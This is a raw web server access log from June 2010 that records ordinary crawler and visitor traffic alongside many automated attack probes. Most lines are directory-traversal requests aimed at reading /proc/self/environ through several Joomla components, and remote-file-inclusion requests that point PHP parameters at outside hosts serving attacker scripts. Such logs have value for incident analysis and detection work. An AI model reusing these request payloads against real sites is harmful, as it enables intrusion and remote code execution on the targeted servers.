74.54.22.2 - - [23/Jun/2010:07:18:22 -0400] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:07:18:22 -0400] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:07:18:22 -0400] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:07:18:22 -0400] "GET /logs/access_log.Q110052800/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
219.117.255.170 - - [23/Jun/2010:07:18:46 -0400] "GET //index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
66.84.0.141 - - [23/Jun/2010:07:18:51 -0400] "GET /logs/access_log.Q109102900//galeria.php?start=0&kategoria=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.810"
66.84.0.141 - - [23/Jun/2010:07:18:51 -0400] "GET //galeria.php?start=0&kategoria=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.810"
66.84.0.141 - - [23/Jun/2010:07:18:51 -0400] "GET /logs//galeria.php?start=0&kategoria=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.810"
66.84.0.141 - - [23/Jun/2010:07:18:59 -0400] "GET //galeria.php?start=0&kategoria=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.810"
66.84.0.141 - - [23/Jun/2010:07:18:59 -0400] "GET //galeria.php?start=0&kategoria=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.810"
66.84.0.141 - - [23/Jun/2010:07:19:01 -0400] "GET //galeria.php?start=0&kategoria=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.810"
66.84.0.141 - - [23/Jun/2010:07:19:02 -0400] "GET //galeria.php?start=0&kategoria=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.810"
67.15.152.183 - - [23/Jun/2010:07:19:10 -0400] "GET /logs/access_log.Q110061500/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
219.117.255.170 - - [23/Jun/2010:07:19:14 -0400] "GET /logs/access_log.Q110061300//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
219.117.255.170 - - [23/Jun/2010:07:19:15 -0400] "GET //index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
219.117.255.170 - - [23/Jun/2010:07:19:19 -0400] "GET /logs//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
66.84.0.141 - - [23/Jun/2010:07:19:57 -0400] "GET /logs/access_log.Q109102900//galeria.php?start=0&kategoria=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.810"
66.84.0.141 - - [23/Jun/2010:07:19:57 -0400] "GET //galeria.php?start=0&kategoria=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.810"
66.84.0.141 - - [23/Jun/2010:07:19:57 -0400] "GET /logs//galeria.php?start=0&kategoria=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.810"
66.84.0.141 - - [23/Jun/2010:07:20:02 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.810"
62.182.63.49 - - [23/Jun/2010:07:20:29 -0400] "GET /logs/error_log.Q109090400//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
62.182.63.49 - - [23/Jun/2010:07:20:29 -0400] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
62.182.63.49 - - [23/Jun/2010:07:20:29 -0400] "GET /logs//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
74.55.238.226 - - [23/Jun/2010:07:20:45 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
62.182.63.49 - - [23/Jun/2010:07:20:45 -0400] "GET /logs/error_log.Q109090400//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
62.182.63.49 - - [23/Jun/2010:07:20:45 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
62.182.63.49 - - [23/Jun/2010:07:20:45 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
66.84.0.141 - - [23/Jun/2010:07:20:49 -0400] "GET //galeria.php?start=0&kategoria=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.810"
66.84.0.141 - - [23/Jun/2010:07:20:53 -0400] "GET //galeria.php?start=0&kategoria=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.810"
62.182.63.49 - - [23/Jun/2010:07:21:09 -0400] "GET /logs/access_log.Q110050200//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
66.84.0.141 - - [23/Jun/2010:07:21:22 -0400] "GET /logs/access_log.Q109100200//galeria.php?start=0&kategoria=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.810"
66.84.0.141 - - [23/Jun/2010:07:21:23 -0400] "GET //galeria.php?start=0&kategoria=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.810"
66.84.0.141 - - [23/Jun/2010:07:21:23 -0400] "GET /logs//galeria.php?start=0&kategoria=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.810"
62.182.63.49 - - [23/Jun/2010:07:21:31 -0400] "GET /logs/access_log.Q110050200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
74.55.238.226 - - [23/Jun/2010:07:21:37 -0400] "GET /logs/access_log.Q109071600/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
74.54.22.2 - - [23/Jun/2010:07:21:54 -0400] "GET /logs/access_log.Q110061500/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:07:21:54 -0400] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:07:21:54 -0400] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:07:21:56 -0400] "GET /logs/error_log.Q110053100/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
66.84.0.141 - - [23/Jun/2010:07:21:56 -0400] "GET /logs/access_log.Q109100200//galeria.php?start=0&kategoria=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.810"
66.84.0.141 - - [23/Jun/2010:07:21:56 -0400] "GET //galeria.php?start=0&kategoria=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.810"
66.84.0.141 - - [23/Jun/2010:07:21:56 -0400] "GET /logs//galeria.php?start=0&kategoria=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.810"
74.9.205.39 - - [23/Jun/2010:07:22:17 -0400] "GET //common/include.php?path[docroot]=http://www.chilli.ch/rezepte/momok.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
66.84.0.141 - - [23/Jun/2010:07:22:22 -0400] "GET /logs//galeria.php?start=0&kategoria=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.810"
66.84.0.141 - - [23/Jun/2010:07:22:22 -0400] "GET //galeria.php?start=0&kategoria=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.810"
74.55.238.226 - - [23/Jun/2010:07:22:23 -0400] "GET /logs/access_log.Q109071600%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
74.55.238.226 - - [23/Jun/2010:07:22:23 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
66.249.71.209 - - [23/Jun/2010:07:22:25 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0178D7563D51E900EB5B051+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.71.245.122 - - [23/Jun/2010:07:22:26 -0400] "GET /logs/access_log.Q110061300//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
66.71.245.122 - - [23/Jun/2010:07:22:26 -0400] "GET //index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.831"
66.71.245.122 - - [23/Jun/2010:07:22:26 -0400] "GET /logs//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.831"
66.84.0.141 - - [23/Jun/2010:07:22:45 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.810"
74.55.238.226 - - [23/Jun/2010:07:22:55 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
172.16.1.80 - - [23/Jun/2010:07:22:56 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [23/Jun/2010:07:22:56 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [23/Jun/2010:07:22:56 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
66.84.0.141 - - [23/Jun/2010:07:23:13 -0400] "GET /logs/error_log.Q109090800//galeria.php?start=0&kategoria=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.810"
66.84.0.141 - - [23/Jun/2010:07:23:14 -0400] "GET //galeria.php?start=0&kategoria=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.810"
66.84.0.141 - - [23/Jun/2010:07:23:14 -0400] "GET /logs//galeria.php?start=0&kategoria=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.810"
66.71.245.122 - - [23/Jun/2010:07:23:24 -0400] "GET /logs/access_log.Q110061100//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
203.252.71.232 - - [23/Jun/2010:07:23:28 -0400] "GET //common/include.php?path[docroot]=http://www.chilli.ch/rezepte/momok.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
74.54.22.2 - - [23/Jun/2010:07:23:46 -0400] "GET /logs/access_log.Q110060700/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
209.59.12.99 - - [23/Jun/2010:07:23:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
95.108.245.251 - - [23/Jun/2010:07:23:01 -0400] "GET /logs/access_log.Q109051900 HTTP/1.1" 200 5938231 "-" "Yandex/1.01.001 (compatible; Win16; I)"
67.195.114.223 - - [23/Jun/2010:07:24:21 -0400] "GET /logs/access_log.Q110010100 HTTP/1.0" 200 3111417 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.78.118.123 - - [23/Jun/2010:07:25:08 -0400] "GET /logs/access_log.Q110061300/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
121.78.118.123 - - [23/Jun/2010:07:25:09 -0400] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
94.23.45.80 - - [23/Jun/2010:07:25:09 -0400] "GET /logs/access_log.Q110021300/home.php?index=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
94.23.45.80 - - [23/Jun/2010:07:25:09 -0400] "GET /home.php?index=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 206 "-" "libwww-perl/5.803"
94.23.45.80 - - [23/Jun/2010:07:25:10 -0400] "GET /logs/home.php?index=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 211 "-" "libwww-perl/5.803"
121.78.118.123 - - [23/Jun/2010:07:25:10 -0400] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
203.252.71.232 - - [23/Jun/2010:07:25:34 -0400] "GET /logs/access_log.Q110021300//common/include.php?path[docroot]=http://www.chilli.ch/rezepte/momok.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
203.252.71.232 - - [23/Jun/2010:07:25:34 -0400] "GET //common/include.php?path[docroot]=http://www.chilli.ch/rezepte/momok.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
203.252.71.232 - - [23/Jun/2010:07:25:35 -0400] "GET /logs//common/include.php?path[docroot]=http://www.chilli.ch/rezepte/momok.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
94.23.45.80 - - [23/Jun/2010:07:26:35 -0400] "GET /logs/access_log.Q110013100/home.php?index=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
94.23.45.80 - - [23/Jun/2010:07:26:35 -0400] "GET /home.php?index=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 206 "-" "libwww-perl/5.803"
94.23.45.80 - - [23/Jun/2010:07:26:35 -0400] "GET /logs/home.php?index=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 211 "-" "libwww-perl/5.803"
94.23.45.80 - - [23/Jun/2010:07:27:07 -0400] "GET /logs/error_log.Q110013100/home.php?index=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
184.73.59.184 - - [23/Jun/2010:07:27:25 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.59.184 - - [23/Jun/2010:07:27:25 -0400] "GET /logs/error_log.Q109082500 HTTP/1.1" 200 3935237 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
64.221.88.162 - - [23/Jun/2010:07:28:06 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDS; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)"
64.221.88.162 - - [23/Jun/2010:07:28:06 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDS; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)"
64.221.88.162 - - [23/Jun/2010:07:28:07 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDS; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)"
64.221.88.162 - - [23/Jun/2010:07:28:07 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDS; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)"
67.218.116.169 - - [23/Jun/2010:07:28:35 -0400] "GET /images/_notes/nav04_products_off.jpg.mno HTTP/1.1" 200 259 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
74.9.205.39 - - [23/Jun/2010:07:28:50 -0400] "GET /logs/access_log.Q110012000//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.chilli.ch/rezepte/momok.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
74.9.205.39 - - [23/Jun/2010:07:28:50 -0400] "GET //wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.chilli.ch/rezepte/momok.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
74.9.205.39 - - [23/Jun/2010:07:28:50 -0400] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.chilli.ch/rezepte/momok.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
67.15.152.183 - - [23/Jun/2010:07:28:54 -0400] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
203.252.71.232 - - [23/Jun/2010:07:29:23 -0400] "GET /logs/error_log.Q110021300//common/include.php?path[docroot]=http://www.chilli.ch/rezepte/momok.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
67.195.114.223 - - [23/Jun/2010:07:28:23 -0400] "GET /logs/access_log.Q110060300 HTTP/1.0" 200 7641988 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.84.0.141 - - [23/Jun/2010:07:29:37 -0400] "GET /logs//galeria.php?start=0&kategoria=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.810"
66.84.0.141 - - [23/Jun/2010:07:29:37 -0400] "GET //galeria.php?start=0&kategoria=http://mvsb.ru//modules/xoopsgallery/wievtopic.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.810"
217.31.58.188 - - [23/Jun/2010:07:30:00 -0400] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
194.54.88.38 - - [23/Jun/2010:07:30:03 -0400] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
66.249.71.209 - - [23/Jun/2010:07:30:04 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L010BDD521F62940002BC08P+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.148.93.62 - - [23/Jun/2010:07:30:08 -0400] "GET //index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
74.55.238.226 - - [23/Jun/2010:07:30:13 -0400] "GET /logs/access_log.Q109100200/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
95.108.245.251 - - [23/Jun/2010:07:30:43 -0400] "GET /logs/error_log.Q109121100 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
217.31.58.188 - - [23/Jun/2010:07:30:53 -0400] "GET /logs/access_log.Q110061500/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
217.31.58.188 - - [23/Jun/2010:07:30:54 -0400] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
217.31.58.188 - - [23/Jun/2010:07:30:54 -0400] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
217.31.58.188 - - [23/Jun/2010:07:31:00 -0400] "GET /logs/access_log.Q110061000/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
172.16.1.180 - - [23/Jun/2010:07:31:00 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Jun/2010:07:31:00 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Jun/2010:07:31:00 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
194.54.88.38 - - [23/Jun/2010:07:31:16 -0400] "GET /logs/access_log.Q110061500/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
194.54.88.38 - - [23/Jun/2010:07:31:17 -0400] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
194.54.88.38 - - [23/Jun/2010:07:31:17 -0400] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
121.78.118.123 - - [23/Jun/2010:07:31:19 -0400] "GET /logs/access_log.Q110061200/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
194.54.88.38 - - [23/Jun/2010:07:31:27 -0400] "GET /logs/access_log.Q110061000/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
64.91.250.11 - - [23/Jun/2010:07:31:58 -0400] "GET /mantis/login_page.php?g_meta_include_file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:31:58 -0400] "GET /logs/mantis/login_page.php?g_meta_include_file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:31:58 -0400] "GET /logs/access_log.Q110010900/mantis/login_page.php?g_meta_include_file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:31:58 -0400] "GET /logs/error_log.Q110010900/mantis/login_page.php?g_meta_include_file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
174.121.166.146 - - [23/Jun/2010:07:32:01 -0400] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
64.91.250.11 - - [23/Jun/2010:07:32:03 -0400] "GET /logs/mantis/login_page.php?g_meta_include_file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:32:03 -0400] "GET /logs/access_log.Q110010900/mantis/login_page.php?g_meta_include_file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:32:03 -0400] "GET /mantis/login_page.php?g_meta_include_file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:32:03 -0400] "GET /logs/error_log.Q110010900/mantis/login_page.php?g_meta_include_file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:32:25 -0400] "GET /logs/access_log.Q110010900%20%20/mantis/login_page.php?g_meta_include_file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
184.73.59.184 - - [23/Jun/2010:07:32:25 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
184.73.59.184 - - [23/Jun/2010:07:32:26 -0400] "GET /logs/access_log.Q109052700 HTTP/1.1" 200 4217417 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
64.91.250.11 - - [23/Jun/2010:07:32:28 -0400] "GET /logs/error_log.Q110010900%20%20/mantis/login_page.php?g_meta_include_file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
184.73.59.184 - - [23/Jun/2010:07:32:34 -0400] "GET /logs/access_log.Q110020600 HTTP/1.1" 200 2788229 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
67.225.141.62 - - [23/Jun/2010:07:32:41 -0400] "GET //linkadmin.php?page=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:32:41 -0400] "GET /logs//linkadmin.php?page=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:32:41 -0400] "GET /logs/error_log.Q110032200//linkadmin.php?page=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:32:41 -0400] "GET /logs/access_log.Q110032200//linkadmin.php?page=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:32:43 -0400] "GET /logs/access_log.Q110010900%20%20/mantis/login_page.php?g_meta_include_file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
